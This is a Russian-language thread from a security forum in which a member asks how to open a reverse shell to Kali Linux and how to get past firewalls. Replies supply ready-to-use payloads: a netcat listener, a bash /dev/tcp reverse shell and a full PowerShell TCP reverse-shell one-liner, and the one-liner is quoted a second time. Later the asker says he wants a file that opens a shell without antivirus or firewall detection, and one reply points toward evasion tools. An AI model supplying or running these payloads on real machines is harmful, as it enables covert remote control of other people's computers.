• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

по поводу ReverseShell

r24627306

Member
29.05.2022
24
0
BIT
0
Здравствуйте,

Помогите пожалуйста,

Поделитесь ссылкой где описанна процедура с Reverse Shell что бы другой компьютер (свой же) подключился через Reverse Shell к Kali Linux.
А затем у меня вопрос: При соединение через Реверсинг браудмер будет ли блокировать подключение ? Как я понял то - нет. Если да, то как обойти ?

Если у вас есть полная подробная статья, буду вам благодарен.
Заранее спасибо.
 

GoBL1n

Grey Team
04.08.2016
497
130
BIT
152
на кали: nc -lvnp 9001
на "другом компе": sh -i >& /dev/tcp/IP_ADR_KALI/9001 0>&1 = если Linux
но у тебя я так понял вин на "другом компе", тогда в PowerShell :

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

заменить «<IP>» и «<port>»

глянь сайт

по поводу брандмауэра - скорее заблокирует

и ваще, почитай про Reverse Shell для начала, что это и какие бывают. А лучше сразу писать задачу, возможно твоя задача решается намного проще...
 
Последнее редактирование:

larchik

Red Team
07.06.2019
374
428
BIT
249
браудмер будет ли блокировать подключение ?
смотря как он настроен. На удаленной машине могут быть заблокированы исходящие соединения на некоторые порты (чаще на все, кроме некоторых). На локальной машине могут быть заблокированы входящие.
 

r24627306

Member
29.05.2022
24
0
BIT
0
на кали: nc -lvnp 9001
на "другом компе": sh -i >& /dev/tcp/IP_ADR_KALI/9001 0>&1 = если Linux
но у тебя я так понял вин на "другом компе", тогда в PowerShell :

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

заменить «<IP>» и «<port>»

глянь сайт

по поводу брандмауэра - скорее заблокирует

и ваще, почитай про Reverse Shell для начала, что это и какие бывают. А лучше сразу писать задачу, возможно твоя задача решается намного проще...
для начала, спасибо за ответ.
но я думал все будет не много проще... например без того что бы вводить команды в PowerShell например я просто открою какой то файл без того что бы его спалил какой то антивирус и стена не блокировала подключение . или это уже не reverse идет ??
 

r24627306

Member
29.05.2022
24
0
BIT
0
смотря как он настроен. На удаленной машине могут быть заблокированы исходящие соединения на некоторые порты (чаще на все, кроме некоторых). На локальной машине могут быть заблокированы входящие.
спасибо за ответ.
 

GoBL1n

Grey Team
04.08.2016
497
130
BIT
152
для начала, спасибо за ответ.
но я думал все будет не много проще... например без того что бы вводить команды в PowerShell например я просто открою какой то файл без того что бы его спалил какой то антивирус и стена не блокировала подключение . или это уже не reverse идет ??
вот теперь понятна задача))
привет из прошлого)))

"без того что бы вводить команды в PowerShell например я просто открою какой то файл без того что бы его спалил какой то антивирус" - бро, кроме антивируса ( с кучей модулей и векторов проверок) есть ещё куча других защит, UAC, брандмауэр, встроенный антивирь, фаерфол установленный и т.п. Не всё так просто, ни кто тебе не расскажет, как взломать современный комп незаметно )))
 

larchik

Red Team
07.06.2019
374
428
BIT
249
для начала, спасибо за ответ.
но я думал все будет не много проще... например без того что бы вводить команды в PowerShell например я просто открою какой то файл без того что бы его спалил какой то антивирус и стена не блокировала подключение . или это уже не reverse идет ??
Просто открыть файл - ну можно шелл сохранить скрипт в файл bash или ps1, и выполнить его ) а чтоб его не палил антивирус, можно поизучать соответствующий софт, например:
 

r24627306

Member
29.05.2022
24
0
BIT
0
вот теперь понятна задача))
привет из прошлого)))

"без того что бы вводить команды в PowerShell например я просто открою какой то файл без того что бы его спалил какой то антивирус" - бро, кроме антивируса ( с кучей модулей и векторов проверок) есть ещё куча других защит, UAC, брандмауэр, встроенный антивирь, фаерфол установленный и т.п. Не всё так просто, ни кто тебе не расскажет, как взломать современный комп незаметно )))
хехе) ну буду учится.. но идею ты полностью понял.
 

r24627306

Member
29.05.2022
24
0
BIT
0
Просто открыть файл - ну можно шелл сохранить скрипт в файл bash или ps1, и выполнить его ) а чтоб его не палил антивирус, можно поизучать соответствующий софт, например:
спасибо бро
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!